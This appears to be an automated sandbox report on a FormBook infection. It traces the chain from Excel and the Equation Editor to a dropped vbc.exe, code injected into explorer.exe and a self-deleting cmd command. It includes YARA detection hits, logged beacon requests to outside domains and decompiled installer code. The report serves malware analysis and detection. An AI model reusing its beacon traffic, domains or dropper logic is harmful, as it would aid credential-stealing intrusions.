                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.224916975.2.60.580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 2, 2021 09:28:30.750937939 CET318OUTGET /ddzw/?h2Mdq=CC4eYJ6GdM3g7jV/74DGeVNO7dTe5083KAYqQjLLOiGFZCFwrjOGC7P0JmGnSxw4GGM5lA==&_x=gVp0dvG0DtZT6do0 HTTP/1.1
                                                Host: www.metanetgateway.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 2, 2021 09:28:31.052886963 CET319INHTTP/1.1 301 Moved Permanently
                                                access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
                                                access-control-allow-methods: *
                                                access-control-allow-origin: *
                                                cache-control: public, max-age=0, must-revalidate
                                                content-length: 52
                                                content-type: text/plain
                                                date: Tue, 02 Nov 2021 04:27:09 GMT
                                                age: 14481
                                                location: https://www.metanetgateway.com/ddzw/?h2Mdq=CC4eYJ6GdM3g7jV/74DGeVNO7dTe5083KAYqQjLLOiGFZCFwrjOGC7P0JmGnSxw4GGM5lA==&_x=gVp0dvG0DtZT6do0
                                                x-nf-request-id: 01FKFW76VGRSKD54DKFQGMATP0
                                                server: Netlify
                                                Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 65 74 61 6e 65 74 67 61 74 65 77 61 79 2e 63 6f 6d 2f 64 64 7a 77 2f 0a
                                                Data Ascii: Redirecting to https://www.metanetgateway.com/ddzw/


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.2249170162.241.253.23180C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 2, 2021 09:28:36.335340977 CET320OUTGET /ddzw/?h2Mdq=iXrnxWa2MIQCLF3pcDg6+qoW1dWPNK8gD+C0AcHvSyjXkMlp/HpcZgrhMm+aOjdhifJKjg==&_x=gVp0dvG0DtZT6do0 HTTP/1.1
                                                Host: www.sarahannsartstudio.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 2, 2021 09:28:38.020910978 CET321INHTTP/1.1 301 Moved Permanently
                                                Date: Tue, 02 Nov 2021 08:28:37 GMT
                                                Server: nginx/1.19.10
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 0
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: http://sarahannsartstudio.com/ddzw/?h2Mdq=iXrnxWa2MIQCLF3pcDg6+qoW1dWPNK8gD+C0AcHvSyjXkMlp/HpcZgrhMm+aOjdhifJKjg==&_x=gVp0dvG0DtZT6do0
                                                host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                X-Endurance-Cache-Level: 0
                                                X-nginx-cache: WordPress
                                                X-Server-Cache: true
                                                X-Proxy-Cache: MISS


                                                Code Manipulations

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                Analysis Process: EXCEL.EXE PID: 2124 Parent PID: 596

                                                General

                                                Start time:09:26:16
                                                Start date:02/11/2021
                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                Wow64 process (32bit):false
                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                Imagebase:0x13f790000
                                                File size:28253536 bytes
                                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: EQNEDT32.EXE PID: 2580 Parent PID: 596

                                                General

                                                Start time:09:26:37
                                                Start date:02/11/2021
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                Imagebase:0x400000
                                                File size:543304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: vbc.exe PID: 2856 Parent PID: 2580

                                                General

                                                Start time:09:26:45
                                                Start date:02/11/2021
                                                Path:C:\Users\Public\vbc.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\Public\vbc.exe'
                                                Imagebase:0x400000
                                                File size:292696 bytes
                                                MD5 hash:11CBFA99FB5EBE8C09674E79B9834D96
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                Reputation:low

                                                Chronological Activities

                                                Analysis Process: vbc.exe PID: 1868 Parent PID: 2856

                                                General

                                                Start time:09:26:46
                                                Start date:02/11/2021
                                                Path:C:\Users\Public\vbc.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\Public\vbc.exe'
                                                Imagebase:0x400000
                                                File size:292696 bytes
                                                MD5 hash:11CBFA99FB5EBE8C09674E79B9834D96
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Chronological Activities

                                                Analysis Process: explorer.exe PID: 1764 Parent PID: 1868

                                                General

                                                Start time:09:26:51
                                                Start date:02/11/2021
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0xffa10000
                                                File size:3229696 bytes
                                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: NETSTAT.EXE PID: 2076 Parent PID: 1764

                                                General

                                                Start time:09:27:04
                                                Start date:02/11/2021
                                                Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                Imagebase:0xd30000
                                                File size:27136 bytes
                                                MD5 hash:32297BB17E6EC700D0FC869F9ACAF561
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                Chronological Activities

                                                Analysis Process: cmd.exe PID: 2036 Parent PID: 2076

                                                General

                                                Start time:09:27:07
                                                Start date:02/11/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                Imagebase:0x4ab30000
                                                File size:302592 bytes
                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Disassembly

                                                Code Analysis

                                                Reset < >

                                                  Analysis Process: vbc.exe PID: 2856 Parent PID: 2580 vbc.exeCOMMON

                                                  Executed Functions

                                                  Function 004030FB, Relevance: 80.8, APIs: 26, Strings: 20, Instructions: 315stringfilecomCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				intOrPtr _t87;
				int _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				intOrPtr _t138;
				char _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E00405F28(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056B6(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								_t57 =  &(_t56[2]);
								__eflags =  &(_t56[2]);
								E00405B98("C:\\Users\\Albus\\AppData\\Local\\Temp", _t57);
								L25:
								_t116 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116);
								_t60 = E004030CA(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403511();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x423fd4; // 0x0
											if(__eflags == 0) {
												L64:
												_t64 =  *0x423fec; // 0xffffffff
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F28(5);
											_t119 = E00405F28(6);
											_t67 = E00405F28(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F28(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405459( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									_t138 =  *0x423f5c; // 0x0
									if(_t138 == 0) {
										L36:
										 *0x423fec =  *0x423fec | 0xffffffff;
										 *(_t129 + 0x1c) = E004035EB( *0x423fec);
										goto L37;
									}
									_t123 = E004056B6(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E004053E0(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Users\\Public";
										if(lstrcmpiA(_t116, "C:\\Users\\Public") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E004053C3();
											} else {
												E00405346();
											}
											SetCurrentDirectoryA(_t116);
											_t147 = "C:\\Users\\Albus\\AppData\\Local\\Temp"; // 0x43
											if(_t147 == 0) {
												E00405B98("C:\\Users\\Albus\\AppData\\Local\\Temp", _t127);
											}
											E00405B98(0x425000,  *(_t129 + 0x20));
											 *0x425400 = 0x41;
											_t128 = 0x1a;
											do {
												_t87 =  *0x423f50; // 0x520d18
												E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t87 + 0x120)));
												DeleteFileA(0x41f0f0);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Users\\Public\\vbc.exe", 0x41f0f0, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x41f0f0);
														E004058E6(_t149);
														_t93 =  *0x423f50; // 0x520d18
														E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t93 + 0x124)));
														_t95 = E004053F8(0x41f0f0);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x425400 =  *0x425400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E004058E6(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040576C(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405B98("C:\\Users\\Albus\\AppData\\Local\\Temp", _t124);
									E00405B98("C:\\Users\\Albus\\AppData\\Local\\Temp", _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E004030CA(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EBA(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F28(0xd);
					_t47 = E00405F28(0xb);
					 *0x423f44 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
					 *0x423ff8 = _t47;
					SHGetFileInfoA(0x41f4f0, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405B98("jhaljjbgtengrcaq Setup", "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "\"C:\\Users\\Public\\vbc.exe\" ";
					E00405B98(_t125, _t51);
					 *0x423f40 = GetModuleHandleA(0);
					_t54 = _t125;
					if("\"C:\\Users\\Public\\vbc.exe\" " == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M0042A001;
					}
					_t56 = CharNextA(E004056B6(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}


































                                                  0x0040310c
                                                  0x00403110
                                                  0x00403118
                                                  0x0040311c
                                                  0x00403121
                                                  0x00403131
                                                  0x00403134
                                                  0x0040313b
                                                  0x00403142
                                                  0x00403142
                                                  0x0040313b
                                                  0x00403144
                                                  0x00403144
                                                  0x0040325a
                                                  0x0040325a
                                                  0x0040325a
                                                  0x0040325c
                                                  0x0040325e
                                                  0x00000000
                                                  0x00000000
                                                  0x004031f3
                                                  0x004031f6
                                                  0x004031fe
                                                  0x004031fe
                                                  0x00403201
                                                  0x00403206
                                                  0x00403208
                                                  0x00403208
                                                  0x00403209
                                                  0x00403209
                                                  0x0040320e
                                                  0x00403211
                                                  0x0040324a
                                                  0x0040324f
                                                  0x00403254
                                                  0x00403257
                                                  0x00403259
                                                  0x00403259
                                                  0x00403259
                                                  0x00000000
                                                  0x00403213
                                                  0x00403213
                                                  0x00403214
                                                  0x00403217
                                                  0x0040321f
                                                  0x00403222
                                                  0x00403224
                                                  0x00403224
                                                  0x00403224
                                                  0x00403224
                                                  0x00403222
                                                  0x00403229
                                                  0x0040322f
                                                  0x00403237
                                                  0x0040323a
                                                  0x0040323c
                                                  0x0040323c
                                                  0x0040323c
                                                  0x0040323c
                                                  0x0040323a
                                                  0x00403241
                                                  0x00403248
                                                  0x00403262
                                                  0x00403265
                                                  0x00403265
                                                  0x0040326e
                                                  0x00403273
                                                  0x00403273
                                                  0x0040327e
                                                  0x00403284
                                                  0x00403289
                                                  0x0040328b
                                                  0x004032b1
                                                  0x004032b6
                                                  0x004032c0
                                                  0x004032c7
                                                  0x004032cb
                                                  0x00403332
                                                  0x00403332
                                                  0x00403337
                                                  0x0040333d
                                                  0x00403341
                                                  0x00403456
                                                  0x0040345c
                                                  0x004034f9
                                                  0x004034f9
                                                  0x004034fe
                                                  0x00403501
                                                  0x00403503
                                                  0x00403503
                                                  0x0040350b
                                                  0x0040350b
                                                  0x0040346b
                                                  0x00403474
                                                  0x00403476
                                                  0x0040347b
                                                  0x0040347d
                                                  0x0040347f
                                                  0x00403481
                                                  0x00403483
                                                  0x00403485
                                                  0x00403487
                                                  0x00403497
                                                  0x00403499
                                                  0x0040349b
                                                  0x004034a8
                                                  0x004034b7
                                                  0x004034bf
                                                  0x004034c7
                                                  0x004034c7
                                                  0x0040349b
                                                  0x00403487
                                                  0x00403483
                                                  0x004034cb
                                                  0x004034d0
                                                  0x004034d7
                                                  0x004034e5
                                                  0x004034e8
                                                  0x004034ee
                                                  0x004034f0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004034d9
                                                  0x004034df
                                                  0x004034e1
                                                  0x004034e3
                                                  0x004034f2
                                                  0x004034f4
                                                  0x00000000
                                                  0x004034f4
                                                  0x00000000
                                                  0x004034e3
                                                  0x004034d7
                                                  0x00403350
                                                  0x00403357
                                                  0x00403357
                                                  0x004032cd
                                                  0x004032d3
                                                  0x00403322
                                                  0x00403322
                                                  0x0040332e
                                                  0x00000000
                                                  0x0040332e
                                                  0x004032dc
                                                  0x004032e9
                                                  0x004032e0
                                                  0x004032e6
                                                  0x00000000
                                                  0x00000000
                                                  0x004032e8
                                                  0x004032e8
                                                  0x004032e8
                                                  0x004032ed
                                                  0x004032ef
                                                  0x004032f7
                                                  0x00403368
                                                  0x0040336a
                                                  0x00403371
                                                  0x00403379
                                                  0x00403379
                                                  0x00403384
                                                  0x00403389
                                                  0x00403398
                                                  0x0040339c
                                                  0x0040339d
                                                  0x004033a6
                                                  0x0040339f
                                                  0x0040339f
                                                  0x0040339f
                                                  0x004033ac
                                                  0x004033b2
                                                  0x004033b8
                                                  0x004033c0
                                                  0x004033c0
                                                  0x004033ce
                                                  0x004033d5
                                                  0x004033de
                                                  0x004033e4
                                                  0x004033e4
                                                  0x004033f0
                                                  0x004033f6
                                                  0x00403400
                                                  0x0040340a
                                                  0x00403410
                                                  0x00403412
                                                  0x00403414
                                                  0x00403415
                                                  0x00403416
                                                  0x0040341b
                                                  0x00403427
                                                  0x0040342d
                                                  0x00403434
                                                  0x00403437
                                                  0x0040343d
                                                  0x0040343d
                                                  0x00403434
                                                  0x00403412
                                                  0x00403441
                                                  0x00403447
                                                  0x00403447
                                                  0x00403447
                                                  0x0040344a
                                                  0x0040344b
                                                  0x0040344c
                                                  0x0040344c
                                                  0x00000000
                                                  0x00403398
                                                  0x004032f9
                                                  0x004032fb
                                                  0x00403306
                                                  0x00000000
                                                  0x00000000
                                                  0x0040330e
                                                  0x00403319
                                                  0x0040331e
                                                  0x00000000
                                                  0x0040331e
                                                  0x00403293
                                                  0x0040329f
                                                  0x004032a4
                                                  0x004032a9
                                                  0x004032ab
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403248
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004031f8
                                                  0x004031f8
                                                  0x004031f8
                                                  0x004031f9
                                                  0x004031f9
                                                  0x00000000
                                                  0x004031f8
                                                  0x00000000
                                                  0x00403149
                                                  0x0040314a
                                                  0x00403156
                                                  0x0040315c
                                                  0x00000000
                                                  0x0040315e
                                                  0x00403160
                                                  0x00403167
                                                  0x0040316c
                                                  0x00403171
                                                  0x00403178
                                                  0x0040317e
                                                  0x00403194
                                                  0x004031a4
                                                  0x004031a9
                                                  0x004031af
                                                  0x004031b6
                                                  0x004031c9
                                                  0x004031ce
                                                  0x004031d0
                                                  0x004031d2
                                                  0x004031d7
                                                  0x004031d7
                                                  0x004031e7
                                                  0x004031ed
                                                  0x00000000
                                                  0x004031ed

                                                  APIs
                                                  • SetErrorMode.KERNEL32 ref: 00403121
                                                  • GetVersion.KERNEL32 ref: 00403127
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403150
                                                  • #17.COMCTL32(0000000B,0000000D), ref: 00403171
                                                  • OleInitialize.OLE32(00000000), ref: 00403178
                                                  • SHGetFileInfoA.SHELL32(0041F4F0,00000000,?,00000160,00000000), ref: 00403194
                                                  • GetCommandLineA.KERNEL32(jhaljjbgtengrcaq Setup,NSIS Error), ref: 004031A9
                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\Public\vbc.exe" ,00000000), ref: 004031BC
                                                  • CharNextA.USER32(00000000), ref: 004031E7
                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040327E
                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403293
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040329F
